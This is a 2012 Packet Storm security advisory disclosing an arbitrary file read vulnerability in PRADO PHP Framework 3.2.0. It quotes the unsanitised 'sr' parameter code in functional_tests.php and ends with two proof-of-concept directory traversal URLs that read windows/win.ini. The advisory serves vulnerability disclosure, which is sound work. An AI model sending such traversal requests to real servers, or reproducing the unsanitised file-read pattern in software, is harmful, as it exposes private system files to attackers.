PRADO PHP Framework 3.2.0 File Read

2012-11-26T00:00:00
ID PACKETSTORM:118348
Type packetstorm
Reporter LiquidWorm
Modified 2012-11-26T00:00:00

Description

                                        
                                            `PRADO PHP Framework 3.2.0 Arbitrary File Read Vulnerability  
  
  
Vendor: Prado Software  
Product web page: http://www.pradosoft.com  
Affected version: 3.2.0 (r3169)  
  
Summary: PRADO is a component-based and event-driven programming  
framework for developing Web applications in PHP 5. PRADO stands  
for PHP Rapid Application Development Object-oriented.  
  
Desc: Input passed to the 'sr' parameter in 'functional_tests.php'  
is not properly sanitised before being used to get the contents of  
a resource. This can be exploited to read arbitrary data from local  
resources with directory traversal attack.  
  
  
---------------------------------------------------------------------------------------  
/tests/test_tools/functional_tests.php:  
---------------------------------------  
  
3: $TEST_TOOLS = dirname(__FILE__);  
4:  
5: if(isset($_GET['sr']))  
6: {  
7:  
8: if(($selenium_resource=realpath($TEST_TOOLS.'/selenium/'.$_GET['sr']))!==false)  
9: echo file_get_contents($selenium_resource);  
10: exit;  
11: }  
  
---------------------------------------------------------------------------------------  
  
  
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)  
Apache 2.4.2 (Win32)  
PHP 5.4.4  
MySQL 5.5.25a  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2012-5113  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5113.php  
  
  
  
25.11.2012  
  
--  
  
http://172.162.133.7/tests/test_tools/functional_tests.php?sr=../../../../../../windows/win.ini  
http://172.162.133.7/demos/time-tracker/tests/functional.php?sr=../../../../../../windows/win.ini  
  
`